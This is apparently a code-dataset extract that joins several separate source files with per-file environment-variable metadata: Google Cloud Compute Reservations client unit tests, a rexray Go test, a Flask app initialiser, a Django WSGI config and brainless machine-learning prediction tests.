assert response.self_link == "self_link_value"
assert response.warning == compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED)
def test_list_rest_from_dict():
test_list_rest(request_type=dict)
def test_list_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationList()
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list(
project="project_value", zone="zone_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
def test_list_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list(
compute.ListReservationsRequest(),
project="project_value",
zone="zone_value",
)
def test_list_pager():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Set the response as a series of pages
response = (
compute.ReservationList(
items=[
compute.Reservation(),
compute.Reservation(),
compute.Reservation(),
],
next_page_token="abc",
),
compute.ReservationList(items=[], next_page_token="def",),
compute.ReservationList(
items=[compute.Reservation(),], next_page_token="ghi",
),
compute.ReservationList(
items=[compute.Reservation(), compute.Reservation(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.ReservationList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
metadata = ()
pager = client.list(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.Reservation) for i in results)
pages = list(client.list(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_resize_rest(
transport: str = "rest", request_type=compute.ResizeReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
error=compute.Error(errors=[compute.Errors(code="code_value")]),
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
warnings=[compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)],
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.resize(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.error == compute.Error(errors=[compute.Errors(code="code_value")])
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.warnings == [
compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)
]
assert response.zone == "zone_value"
def test_resize_rest_from_dict():
test_resize_rest(request_type=dict)
def test_resize_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
reservations_resize_request_resource = compute.ReservationsResizeRequest(
specific_sku_count=1920
)
client.resize(
project="project_value",
zone="zone_value",
reservation="reservation_value",
reservations_resize_request_resource=reservations_resize_request_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "reservation_value" in http_call[1] + str(body) + str(params)
assert compute.ReservationsResizeRequest.to_json(
reservations_resize_request_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_resize_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resize(
compute.ResizeReservationRequest(),
project="project_value",
zone="zone_value",
reservation="reservation_value",
reservations_resize_request_resource=compute.ReservationsResizeRequest(
specific_sku_count=1920
),
)
def test_set_iam_policy_rest(
transport: str = "rest", request_type=compute.SetIamPolicyReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy(
audit_configs=[
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(
exempted_members=["exempted_members_value"]
)
]
)
],
bindings=[compute.Binding(binding_id="binding_id_value")],
etag="etag_value",
iam_owned=True,
rules=[compute.Rule(action=compute.Rule.Action.ALLOW)],
version=774,
)
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_iam_policy(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Policy)
assert response.audit_configs == [
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(exempted_members=["exempted_members_value"])
]
)
]
assert response.bindings == [compute.Binding(binding_id="binding_id_value")]
assert response.etag == "etag_value"
assert response.iam_owned is True
assert response.rules == [compute.Rule(action=compute.Rule.Action.ALLOW)]
assert response.version == 774
def test_set_iam_policy_rest_from_dict():
test_set_iam_policy_rest(request_type=dict)
def test_set_iam_policy_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy()
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
zone_set_policy_request_resource = compute.ZoneSetPolicyRequest(
bindings=[compute.Binding(binding_id="binding_id_value")]
)
client.set_iam_policy(
project="project_value",
zone="zone_value",
resource="resource_value",
zone_set_policy_request_resource=zone_set_policy_request_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "resource_value" in http_call[1] + str(body) + str(params)
assert compute.ZoneSetPolicyRequest.to_json(
zone_set_policy_request_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_set_iam_policy_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_iam_policy(
compute.SetIamPolicyReservationRequest(),
project="project_value",
zone="zone_value",
resource="resource_value",
zone_set_policy_request_resource=compute.ZoneSetPolicyRequest(
bindings=[compute.Binding(binding_id="binding_id_value")]
),
)
def test_test_iam_permissions_rest(
transport: str = "rest", request_type=compute.TestIamPermissionsReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.TestPermissionsResponse(
permissions=["permissions_value"],
)
# Wrap the value into a proper Response obj
json_return_value = compute.TestPermissionsResponse.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.test_iam_permissions(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.TestPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_rest_from_dict():
test_test_iam_permissions_rest(request_type=dict)
def test_test_iam_permissions_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.TestPermissionsResponse()
# Wrap the value into a proper Response obj
json_return_value = compute.TestPermissionsResponse.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
test_permissions_request_resource = compute.TestPermissionsRequest(
permissions=["permissions_value"]
)
client.test_iam_permissions(
project="project_value",
zone="zone_value",
resource="resource_value",
test_permissions_request_resource=test_permissions_request_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "resource_value" in http_call[1] + str(body) + str(params)
assert compute.TestPermissionsRequest.to_json(
test_permissions_request_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_test_iam_permissions_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.test_iam_permissions(
compute.TestIamPermissionsReservationRequest(),
project="project_value",
zone="zone_value",
resource="resource_value",
test_permissions_request_resource=compute.TestPermissionsRequest(
permissions=["permissions_value"]
),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReservationsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReservationsClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = ReservationsClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize("transport_class", [transports.ReservationsRestTransport,])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_reservations_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.ReservationsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_reservations_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.ReservationsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"aggregated_list",
"delete",
"get",
"get_iam_policy",
"insert",
"list",
"resize",
"set_iam_policy",
"test_iam_permissions",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
@requires_google_auth_gte_1_25_0
def test_reservations_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReservationsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_reservations_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReservationsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_reservations_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReservationsTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_reservations_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReservationsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_reservations_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReservationsClient()
adc.assert_called_once_with(
scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_reservations_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
transports.ReservationsRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
def test_reservations_host_no_port():
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
)
assert client.transport._host == "compute.googleapis.com:443"
def test_reservations_host_with_port():
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
)
assert client.transport._host == "compute.googleapis.com:8000"
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = ReservationsClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = ReservationsClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = ReservationsClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = ReservationsClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = ReservationsClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = ReservationsClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = ReservationsClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = ReservationsClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = ReservationsClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = ReservationsClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.ReservationsTransport, "_prep_wrapped_messages"
) as prep:
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.ReservationsTransport, "_prep_wrapped_messages"
) as prep:
transport_class = ReservationsClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
libstorage/drivers/storage/azureud/utils/utils_test.go
|
package utils
import (
"os"
"strconv"
"testing"
"github.com/stretchr/testify/assert"
"github.com/rexray/rexray/libstorage/api/context"
)
func skipTest(t *testing.T) {
if ok, _ := strconv.ParseBool(os.Getenv("AZUREUD_UTILS_TEST")); !ok {
t.Skip()
}
}
func TestInstanceID(t *testing.T) {
skipTest(t)
iid, err := InstanceID(context.Background())
if !assert.NoError(t, err) {
t.FailNow()
}
t.Logf("instanceID=%s", iid.String())
}
|
[
"\"AZUREUD_UTILS_TEST\""
] |
[] |
[
"AZUREUD_UTILS_TEST"
] |
[]
|
["AZUREUD_UTILS_TEST"]
|
go
| 1 | 0 | |
crossword/__init__.py
|
import os
from flask import Flask
from flask_sslify import SSLify
app = Flask(__name__)
sslify = SSLify(app)
config_path = os.environ.get("CONFIG_PATH", "crossword.config.TravisConfig")
app.config.from_object(config_path)
from . import views
from . import filters
from . import login
|
[] |
[] |
[
"CONFIG_PATH"
] |
[]
|
["CONFIG_PATH"]
|
python
| 1 | 0 | |
ecomsite/ecomsite/wsgi.py
|
"""
WSGI config for ecomsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecomsite.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/advanced_tests/advanced_install_tests.py
|
import datetime
import os
import random
import sys
import warnings
import numpy as np
from sklearn.model_selection import train_test_split
import tests.utils_testing as utils
from brainless import Predictor
from brainless.utils_models import load_ml_model
sys.path = [os.path.abspath(os.path.dirname(__file__))] + sys.path
os.environ['is_test_suite'] = 'True'
def test_feature_learning_getting_single_predictions_classification(model_name=None):
np.random.seed(0)
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_titanic_train, fl_data = train_test_split(df_titanic_train, test_size=0.2)
ml_predictor.train(
df_titanic_train, model_names=model_name, feature_learning=True, fl_data=fl_data)
file_name = ml_predictor.save(str(random.random()))
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_titanic_test_dictionaries = df_titanic_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
first_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -0.16
if model_name == 'DeepLearningClassifier':
lower_bound = -0.187
assert lower_bound < first_score < -0.133
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_titanic_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_titanic_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() < 15
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
print('df_titanic_test_dictionaries')
print(df_titanic_test_dictionaries)
second_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -0.133
def test_feature_learning_categorical_ensembling_getting_single_predictions_classification(
model_name=None):
np.random.seed(0)
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_titanic_train, fl_data = train_test_split(df_titanic_train, test_size=0.2)
ml_predictor.train_categorical_ensemble(
df_titanic_train,
model_names=model_name,
feature_learning=True,
fl_data=fl_data,
categorical_column='embarked')
file_name = ml_predictor.save(str(random.random()))
from brainless.utils_models import load_ml_model
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_titanic_test_dictionaries = df_titanic_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
first_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -0.175
if model_name == 'DeepLearningClassifier':
lower_bound = -0.245
if model_name == 'CatBoostClassifier':
lower_bound = -0.265
assert lower_bound < first_score < -0.14
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_titanic_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_titanic_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() < 15
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
print('df_titanic_test_dictionaries')
print(df_titanic_test_dictionaries)
second_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -0.147
def test_feature_learning_getting_single_predictions_regression(model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {'MEDV': 'output', 'CHAS': 'categorical'}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_boston_train, fl_data = train_test_split(df_boston_train, test_size=0.2)
ml_predictor.train(
df_boston_train, model_names=model_name, feature_learning=True, fl_data=fl_data)
file_name = ml_predictor.save(str(random.random()))
# from brainless.utils_models import load_keras_model
# saved_ml_pipeline = load_keras_model(file_name)
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_boston_test_dictionaries = df_boston_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
first_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -4.0
assert lower_bound < first_score < -2.8
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_boston_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_boston_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() / 1.0 < 20
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
second_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -2.8
def test_feature_learning_categorical_ensembling_getting_single_predictions_regression(
model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {'MEDV': 'output', 'CHAS': 'categorical'}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_boston_train, fl_data = train_test_split(df_boston_train, test_size=0.2)
ml_predictor.train_categorical_ensemble(
df_boston_train,
model_names=model_name,
feature_learning=True,
fl_data=fl_data,
categorical_column='CHAS')
# print('Score on training data')
# ml_predictor.score(df_boston_train, df_boston_train.MEDV)
file_name = ml_predictor.save(str(random.random()))
from brainless.utils_models import load_ml_model
saved_ml_pipeline = load_ml_model(file_name)
# with open(file_name, 'rb') as read_file:
# saved_ml_pipeline = dill.load(read_file)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_boston_test_dictionaries = df_boston_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
first_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -4.5
assert lower_bound < first_score < -3.4
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_boston_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_boston_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
